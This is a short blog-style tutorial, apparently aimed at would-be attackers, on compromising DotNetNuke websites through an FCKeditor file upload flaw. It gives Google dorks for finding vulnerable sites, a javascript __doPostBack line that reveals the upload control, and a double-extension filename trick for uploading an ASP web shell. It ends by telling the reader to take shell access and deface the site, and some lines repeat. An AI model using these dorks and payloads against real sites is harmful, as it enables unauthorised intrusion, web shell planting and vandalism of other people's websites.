What Is DNN ?
DNN stands for Dot Net Nuke. It have an remote arbitrary File Upload vulnerability. simply said iploading
vulnerrability.
Finding vulnerable websites
Find vulnerable websites by GOOGLE dorks :
inurl:/fck/fcklinkgallery.aspx
inurl:/tabid/36/language/en-US/Default.aspx
I got a target
Select "File" from list.
The in url bar paste the javascript ;
javascript:__doPostBack('ctlURL$cmdUpload','')
Now there appear a uploading bar on page. As seen be below :
Now upload your ASP shell as "shell.asp;.txt , shell.asp;.jpg"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
your uploads will go to "http://www.site.com/Portals/0/shell.asp;.txt"
Now you have a Shell Access to the website . Now deface the website.
Hope You Enjoy....!
Hope You Enjoy....!
0 comments:
Post a Comment